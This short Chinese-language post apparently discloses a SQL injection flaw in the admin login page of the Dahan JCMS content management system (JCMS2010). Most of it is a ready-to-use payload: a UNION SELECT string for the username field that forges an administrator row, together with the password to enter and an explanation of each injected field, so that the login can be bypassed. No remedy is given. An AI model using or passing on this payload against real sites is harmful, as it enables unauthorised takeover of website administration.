大汉版通JCMS内容管理系统SQL注入漏洞

大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。

大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。
#------
后台登录页:http://target.com/jcms/
username:
x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--
pass:
1
#------
其中:
'00000'是验证管理员用户组的一个字段;
'admin'是管理员用户名;
'AEY='加密密码,解密后为'1';
后面的'1'表示帐号启用。

发表评论